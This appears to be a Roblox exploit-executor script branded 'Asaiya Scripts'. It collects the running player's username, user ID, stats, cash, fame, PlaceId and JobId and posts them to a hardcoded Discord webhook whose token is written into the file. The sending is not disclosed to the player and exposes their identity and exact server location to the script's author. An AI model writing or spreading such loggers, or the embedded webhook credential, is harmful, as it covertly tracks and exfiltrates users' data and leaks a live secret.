local url = "https://discord.com/api/webhooks/1365210743317987368/tdThLVO4aYToCdsxgs6YXoeyMIMJoqhWVyhOYBKlBs8E_lNi47AVZLZmK675jl_gDMxw"
local httpService = game:GetService("HttpService")
local player = game:GetService("Players").LocalPlayer
local leaderstats = player:WaitForChild("leaderstats")

-- Suffix table
local suffixTable = {
    [3] = "K", [6] = "M", [9] = "B", [12] = "T",
    [15] = "Qa", [18] = "Qi", [21] = "Sx", [24] = "Sp",
    [27] = "Oc", [30] = "No", [33] = "Dc", [36] = "Ud",
    [39] = "Td", [42] = "Qatd", [45] = "Qitd", [48] = "Sxd",
    [51] = "Spd", [54] = "Ocd", [57] = "Nov", [60] = "Vg",
    [63] = "Uvg", [66] = "Dvg", [69] = "Tvg", [72] = "Uvg",
    [75] = "Qavg", [78] = "Qivg", [81] = "Sxvg", [84] = "Spvg",
    [87] = "Ocvg", [90] = "NovG", [93] = "Tg", [96] = "UTG",
    [99] = "DTG", [102] = "TTG", [105] = "QTG", [108] = "QITG",
    [111] = "SXTG", [114] = "TTG", [117] = "SPTH", [120] = "OCTG"
}

local function formatBigNumber(num)
    num = tonumber(num) or 0
    if num == 0 then return "Concealed :lock:" end

    local exponent = math.floor(math.log10(num))
    local tier = math.floor(exponent / 3) * 3
    tier = math.min(tier, 120)

    local suffix = suffixTable[tier] or ""
    local scaled = num / (10 ^ tier)

    return string.format("%.2f%s", scaled, suffix)
end

local function getFameText()
    local character = player.Character or player.CharacterAdded:Wait()

    if character:FindFirstChild("Head") then
        local head = character.Head
        if head:FindFirstChild("TitleGui") then
            local titleGui = head.TitleGui
            if titleGui:FindFirstChild("FameTxt") then
                return titleGui.FameTxt.Text
            end
        end
    end

    for _, plr in ipairs(game:GetService("Players"):GetPlayers()) do
        if plr.Character then
            local head = plr.Character:FindFirstChild("Head")
            if head then
                local titleGui = head:FindFirstChild("TitleGui")
                if titleGui then
                    local fameTxt = titleGui:FindFirstChild("FameTxt")
                    if fameTxt then
                        return fameTxt.Text
                    end
                end
            end
        end
    end

    return "N/A"
end

local function getServerPopulation()
    local players = game:GetService("Players")
    local playerCount = #players:GetPlayers()
    local maxPlayers = players.MaxPlayers
    return string.format("%d/%d", playerCount, maxPlayers)
end

local function logStats()
    local muscle = leaderstats:WaitForChild("Muscle").Value
    local stage = leaderstats:WaitForChild("Stage").Value
    local killstreak = leaderstats:FindFirstChild("Kill Streak") and leaderstats["Kill Streak"].Value or "N/A"
    local username = player.Name
    local userId = player.UserId
    local placeId = game.PlaceId
    local jobId = game.JobId
    local serverPopulation = getServerPopulation()

    local muscleDisplay = (muscle == "0" or muscle == 0) and "Concealed :lock:" or formatBigNumber(muscle)

    local cashText = player.PlayerGui.Main_Gui.DataMenu_Frame.Cash.Status.Text
    local displayCash = cashText:gsub("0%.00%s*", "")

    local fameText = getFameText()

    local data = {
        ["content"] = "**:bust_in_silhouette: Username:** " .. username ..
                    "\n**:id: User ID:** " .. userId ..
                    "\n**:link: Profile:** [Click Here](https://www.roblox.com/users/" .. userId .. "/profile)" ..
                    "\n**:muscle: Muscle Stat:** " .. muscleDisplay ..
                    "\n**:cyclone: Stage:** " .. stage ..
                    "\n**:moneybag: Cash:** " .. displayCash ..
                    "\n**:sparkles: Fame:** " .. fameText ..
                    "\n**:knife: Killstreak:** " .. killstreak ..
                    "\n**:busts_in_silhouette: Server Population:** " .. serverPopulation ..
                    "\n**:globe_with_meridians: PlaceId:** `" .. placeId .. "`" ..
                    "\n**:satellite: JobId:** `" .. jobId .. "`",
        ["username"] = "Stat Logger",
        ["avatar_url"] = "https://www.roblox.com/headshot-thumbnail/image?userId="..userId.."&width=420&height=420&format=png"
    }

    local headers = {
        ["Content-Type"] = "application/json"
    }

    local body = httpService:JSONEncode(data)

    local success, err = pcall(function()
        http_request({
            Url = url,
            Method = "POST",
            Headers = headers,
            Body = body
        })
    end)

    if not success then
        warn("Webhook failed:", err)
    else
        print("Thanks for Using Asaiya Scripts!")
    end
end

logStats()
-- remove end to continue webhooks
